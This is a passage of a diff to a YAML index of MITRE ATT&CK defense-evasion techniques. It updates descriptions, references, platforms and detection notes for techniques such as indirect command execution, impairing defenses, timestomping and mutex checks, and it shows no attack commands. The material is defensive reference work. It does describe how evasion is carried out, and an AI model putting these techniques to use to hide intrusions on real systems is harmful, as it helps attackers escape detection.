+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1070.007:
@@ -3131,7 +3192,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1600.001:
     technique:
@@ -3157,7 +3217,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:36:22.369Z'
       name: Reduce Key Space
       description: |-
         Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -3180,8 +3240,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.003:
     technique:
@@ -3277,65 +3335,75 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.003
     atomic_tests: []
   T1202:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-03T14:47:17.154Z'
+      name: Indirect Command Execution
+      description: |-
+        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
       x_mitre_contributors:
       - Matthew Demaske, Adaptforward
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+        such as Sysmon, for events such as process creations that include or are resulting
+        from parameters associated with invoking programs/commands/files and/or spawning
+        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      x_mitre_defense_bypassed:
+      - Static File Analysis
+      - Application Control
       type: attack-pattern
       id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
       created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1202
         url: https://attack.mitre.org/techniques/T1202
+        external_id: T1202
+      - source_name: Bleeping Computer - Scriptrunner.exe
+        description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+          tool to deploy malware. Retrieved July 8, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
       - source_name: Evi1cg Forfiles Nov 2017
-        url: https://twitter.com/Evi1cg/status/935027922397573120
         description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
-          January 22, 2018.
+          September 12, 2024.
+        url: https://x.com/Evi1cg/status/935027922397573120
       - source_name: RSA Forfiles Aug 2017
-        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
         description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
           (if you are watching for cmd.exe). Retrieved January 22, 2018.
+        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+      - source_name: Secure Team - Scriptrunner.exe
+        description: Secure Team - Information Assurance. (2023, January 8). Windows
+          Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+        url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+      - source_name: SS64
+        description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+        url: https://ss64.com/nt/scriptrunner.html
       - source_name: VectorSec ForFiles Aug 2017
-        url: https://twitter.com/vector_sec/status/896049052642533376
         description: vector_sec. (2017, August 11). Defenders watching launches of
-          cmd? What about forfiles?. Retrieved January 22, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
-        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Indirect Command Execution
-      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
-        such as Sysmon, for events such as process creations that include or are resulting
-        from parameters associated with invoking programs/commands/files and/or spawning
-        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'Process: Process Creation'
-      x_mitre_defense_bypassed:
-      - Static File Analysis
-      - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+          cmd? What about forfiles?. Retrieved September 12, 2024.
+        url: https://x.com/vector_sec/status/896049052642533376
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1202
     atomic_tests: []
   T1140:
@@ -3402,22 +3470,24 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1140
     atomic_tests: []
   T1562:
     technique:
-      modified: '2023-10-20T16:43:53.391Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Impair Defenses
-      description: |-
+      description: |+
         Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
 
-        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
 
-        Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Jamie Williams (U ω U), PANW Unit 42
+      - Liran Ravich, CardinalOps
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.
@@ -3426,15 +3496,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - IaaS
       - Linux
       - macOS
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Cloud Service: Cloud Service Disable'
@@ -3472,15 +3544,17 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1562
         external_id: T1562
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Emotet shutdown
         description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
           File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
         url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562
     atomic_tests: []
   T1055.003:
@@ -3504,7 +3578,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -3552,13 +3626,11 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1036:
     technique:
-      modified: '2024-03-08T17:00:59.133Z'
+      modified: '2024-10-16T20:10:38.450Z'
       name: Masquerading
       description: |-
         Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -3574,7 +3646,7 @@ defense-evasion:
       - Felipe Espósito, @Pr0teus
       - Elastic
       - Bartosz Jerzman
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -3599,6 +3671,7 @@ defense-evasion:
       - 'Process: Process Creation'
       - 'Image: Image Metadata'
       - 'Scheduled Job: Scheduled Job Metadata'
+      - 'User Account: User Account Creation'
       - 'File: File Metadata'
       - 'Scheduled Job: Scheduled Job Modification'
       - 'Command: Command Execution'
@@ -3616,8 +3689,8 @@ defense-evasion:
         external_id: T1036
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -3630,12 +3703,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036
     atomic_tests: []
   T1070.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:43:56.839Z'
       name: 'Email Collection: Mailbox Manipulation'
       description: "Adversaries may modify mail and mail application data to remove
         evidence of their activity. Email applications allow users and other programs
@@ -3672,9 +3744,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'File: File Deletion'
@@ -3712,14 +3783,13 @@ defense-evasion:
         url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.008
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -3822,12 +3892,11 @@ defense-evasion:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -3911,7 +3980,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218:
     technique:
@@ -3978,60 +4046,77 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218
     atomic_tests: []
   T1070.006:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Romain Dumont, ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
-      type: attack-pattern
-      created: '2020-01-31T12:42:44.103Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.006
-        url: https://attack.mitre.org/techniques/T1070/006
-      - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
-        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
-          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
-        source_name: WindowsIR Anti-Forensic Techniques
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-30T15:14:56.021Z'
       name: 'Indicator Removal on Host: Timestomp'
       description: |-
-        Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+        Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+        Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+        Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+        Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
 
         Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Romain Dumont, ESET
+      - Mike Hartley @mikehartley10
+      x_mitre_deprecated: false
       x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
         have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
         It may be possible to detect timestomping using file modification monitoring
         that collects information on file handle opens and can compare timestamp values.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Process: OS API Execution'
       - 'File: File Modification'
       - 'File: File Metadata'
+      - 'Command: Command Execution'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_permissions_required:
-      - root
-      - SYSTEM
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+      created: '2020-01-31T12:42:44.103Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/006
+        external_id: T1070.006
+      - source_name: WindowsIR Anti-Forensic Techniques
+        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+        url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+      - source_name: Inversecos Timestomping 2022
+        description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+          Detection – NTFS Forensics. Retrieved September 30, 2024.'
+        url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+      - source_name: Magnet Forensics
+        description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+          with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+        url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+      - source_name: Double Timestomping
+        description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+          ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+        url: https://x.com/matthewdunwoody/status/1519846657646604289
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1070.006
     atomic_tests: []
   T1620:
@@ -4134,9 +4219,76 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1620
     atomic_tests: []
+  T1480.002:
+    technique:
+      modified: '2024-10-28T16:22:25.431Z'
+      name: Mutual Exclusion
+      description: |-
+        Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+        While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+        In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+        Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Manikantan Srinivasan, NEC Corporation India
+      - Pooja Natarajan, NEC Corporation India
+      - Nagahama Hiroki – NEC Corporation Japan
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: OS API Execution'
+      - 'File: File Creation'
+      type: attack-pattern
+      id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+      created: '2024-09-19T14:00:03.401Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1480/002
+        external_id: T1480.002
+      - source_name: Intezer RedXOR 2021
+        description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+          Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+          September 19, 2024.
+        url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+      - source_name: Sans Mutexes 2012
+        description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+          Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+        url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+      - source_name: ICS Mutexes 2015
+        description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+          to Evade Detection. Retrieved September 19, 2024.
+        url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+      - source_name: Microsoft Mutexes
+        description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+          2024.
+        url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+      - source_name: Deep Instinct BPFDoor 2023
+        description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+          Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+          19, 2024.
+        url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.011:
     technique:
       modified: '2023-11-06T20:14:51.609Z'
@@ -4200,57 +4352,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
-      type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -4265,6 +4370,12 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -4274,9 +4385,14 @@ defense-evasion:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
